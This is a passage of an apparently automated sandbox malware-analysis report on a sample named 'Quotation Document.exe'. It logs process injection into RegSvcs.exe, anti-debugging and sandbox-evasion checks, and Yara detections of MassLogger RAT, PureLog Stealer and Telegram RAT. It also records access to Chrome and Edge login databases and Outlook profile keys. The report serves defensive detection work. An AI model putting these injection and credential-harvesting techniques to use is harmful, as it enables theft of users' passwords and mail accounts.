Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596014	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595899	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595650	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594995	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594888	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594670	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594552	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594422	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 3394			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 6456			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598904	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598794	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598684	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598473	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597467	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597358	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597226	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596905	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596358	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596248	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596122	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596014	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595899	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595650	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594995	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594888	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594670	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594552	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594422	Jump to behavior

Source: wscript.exe, 00000008.00000002.2859128996.00000204C8836000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000008.00000002.2859128996.00000204C8836000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: RegSvcs.exe, 00000007.00000002.2900815735.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

API call chain: ExitProcess graph end node

graph_7-32358

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_050FB850 LdrInitializeThunk,

7_2_050FB850

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

7_2_0040CE09

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

7_2_004019F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

7_2_004019F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_0040ADB0 GetProcessHeap,HeapFree,

7_2_0040ADB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_004123F1 SetUnhandledExceptionFilter,	7_2_004123F1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, UltraSpeed.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 964008

Jump to behavior

Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Quotation Document.exe"			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\emboweling\neophobia.exe "C:\Users\user\AppData\Local\emboweling\neophobia.exe"			Jump to behavior

Source: Quotation Document.exe, neophobia.exe.0.dr

Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

7_2_00417A20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

7_2_00412A15

Source: C:\Users\user\Desktop\Quotation Document.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c55570.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2830bfe.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2830bfe.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c7e790.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c56458.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5090000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2831ae6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c55570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 8080, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c55570.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2830bfe.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2830bfe.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c7e790.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c56458.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5090000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2831ae6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c55570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c55570.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2830bfe.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2830bfe.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c7e790.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c56458.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5090000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2831ae6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c55570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 8080, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c55570.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2830bfe.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2830bfe.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c7e790.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c56458.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5090000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2831ae6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c55570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 8080, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c55570.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2830bfe.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2830bfe.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c7e790.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c56458.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5090000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2831ae6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c55570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 8080, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 7.2.RegSvcs.exe.2ba0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c55570.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2830bfe.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2830bfe.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c7e790.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3c56458.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5090000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.2831ae6.2.unpack, type: UNPACKEDPE
